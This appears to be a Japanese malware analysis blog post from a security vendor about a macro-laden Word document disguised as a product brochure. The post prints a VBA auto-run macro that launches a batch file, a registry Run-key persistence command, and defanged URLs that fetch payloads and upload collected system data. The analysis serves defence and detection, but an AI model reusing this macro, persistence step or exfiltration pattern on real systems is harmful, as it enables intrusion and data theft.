製品紹介書に偽装した不正な Word ドキュメント

ASEC 分析チームは、昨年12月に掲載した<デザイン修正リクエストのドキュメントに偽装した情報窃取目的の不正な Word>と同じタイプの Word ドキュメントを確認した。今回確認された Word ドキュメントのタイトルは製品紹介書.doc」であり、内部に特定の製品に関する説明を含んでいることからして、物流、ショッピング関連企業をターゲットにした攻撃と推定される。

確認された Word ドキュメントの内部には以前と同じ画像が含まれており、マクロの有効化を誘導する。

図1.製品紹介書.doc ファイルの中身

この Word ドキュメントは「디자인수정 요청.doc」(翻訳:デザイン修正リクエスト.doc)ファイルと作成日時、作成者、前回保存者の情報がすべて一致している。これによって、攻撃者が同じファイルを編集して使用しているものと推定される。

図2.ドキュメントのプロパティ(左:デザイン修正要請.doc / 右:製品紹介書.doc)

ドキュメント内部には不正な VBA マクロが含まれている。マクロを実行すると、Document_Open() 関数によって不正なマクロが自動で実行される。マクロコードについては前回に比べて多少難読化された形で存在しており、hxxp://manage-box.com/ord03 または /doc03 から、さらなるファイルをダウンロードする。

図3.Word ドキュメントに含まれた VBA マクロコードの一部

VBA マクロによってダウンロードされるファイルは、以下の通りである。ダウンロードされた setup.cab ファイルの内部には download.vbs、error.bat、no4.bat、start.vbs、upload.vbs の計5種類のスクリプトが存在する。

ダウンロード URL保存先およびファイル名
hxxp://manage-box[.]com/ord03/no03.txtC:\Users\Public\Documents\no1.bat
hxxp://manage-box[.]com/ord03/vbs03.txtC:\Users\Public\Documents\setup.cab
hxxp://manage-box[.]com/doc03/temp1403.docC:\Users\Public\Documents\temp.doc
表1.ダウンロード URL および保存先

その後、ダウンロードした temp.doc ファイルを実行する。この Word ドキュメントは特定の企業を詐称して特定製品に関する内容を含んでいる。

図4.temp.doc ファイルの中身

この temp.doc ドキュメントも前回の「デザイン修正要請.doc」ファイルと作成日時、作成者、前回保存者の情報がすべて一致している。

図5.ドキュメントのプロパティ
(左:デザイン修正要請.doc においてダウンロードした temp.doc
右:製品紹介書.doc においてダウンロードした temp.doc)

temp.doc ドキュメントにも VBA マクロが含まれており、先にダウンロードした no1.bat を実行する。

Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal nCmdShow As Long _
) As Long

Sub Document_Open()
   WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub

現在 no1.bat ファイルは確認されていないが、各スクリプトの機能がすべて過去に紹介した内容と同じことからして、従来と同様に error.bat ファイルを実行させるものと推定される。各スクリプトファイルの主な振る舞いは以下の通りである。

ファイル名主な振る舞い
error.batstart.vbs ファイルのレジストリ登録
no4.bat ファイルの実行
追加ファイルのダウンロード
start.vbsError.bat の実行
no4.bat情報収集および転送
download.vbsダウンロード機能の実行
upload.vbsアップロード機能の実行
表2.スクリプト名&主な振る舞い

error.bat ファイルが実行されると以下のコマンドが実行され、start.vbs ファイルが持続的に実行されるようにする。

  • “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v svchostno2 /t REG_SZ /d “C:\Users\Public\Documents\start.vbs”

その後 no4.bat ファイルを実行して特定ファイルの有無を確認したあと、hxxp://safemaners.com/dow11/%COMPUTERNAME%.txt からさらなるファイルをダウンロードする。no4.bat ファイルは以下のユーザー PC の情報を収集し、hxxp://safemaners[.]com/upl11/upload.php へ転送する機能を実行する。

収集項目保存ファイル名
C:\Users\%username%\downloads\ リスト%~dp0\cuserdown.txt
C:\Users\%username%\documents\ リスト%~dp0\cuserdocu.txt
C:\Users\%username%\desktop\ リスト%~dp0\cuserdesk.txt
C:\Program Files\ リスト%~dp0\cprog.txt
IP 情報%~dp0\ipinfo.txt
tasklist%~dp0\tsklt.txt
systeminfo%~dp0\systeminfo.txt
表3.収集項目および保存ファイル名

現在は、Word ドキュメントとスクリプトファイルにおいて確認された不正な URL である manage-box[.]com と safemaners[.]com に接続すると mail.naver.com へリダイレクトする。これは、攻撃者がユーザーに正常なサイトであるかのように見せるためのものと推定される。

このように、韓国国内のユーザーをターゲットとした Word ドキュメントのうち、対北朝鮮の内容ではなく物流、ショッピング関連の内容を含んでいる不正な Word ドキュメントが確認されているため、ユーザーの注意が要求される。不明なユーザーから受信したメールの添付ファイルは開かないようにし、自身に関連のある内容が含まれていても、送信者を必ず確認しなければならない。

[V3 検知]

  • Downloader/DOC.Generic
  • Trojan/DOC.Agent
  • Trojan/VBS.Runner
  • Trojan/BAT.Agent
  • Downloader/BAT.Generic

[関連 IOC 情報]

  • 10610cfe6cbf5a7dd5198a87e3186294
  • 7bc342318717ac411898324baf549b76
  • dc5ecb12dae64202922437edbe5a4842
  • hxxp://manage-box.com/ord03/no03.txt
  • hxxp://manage-box.com/ord03/vbs03.txt
  • hxxp://manage-box.com/doc03/temp1403.doc
  • hxxp://safemaners[.]com/upl11/upload.php

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

5 1 vote
評価する
guest
2 コメント
Inline Feedbacks
View all comments
trackback

[…] 3件が確認されており、マクロの製作者および動作方式は3月17日に ASEC ブログで掲載した内容(タイトル:製品紹介書に偽装した不正な Word […]

trackback

[…] このドキュメントの作成日時は3月28日であり、製作者は過去の ASEC ブログを通じて公開した製作者名(Acer)と一致している。 […]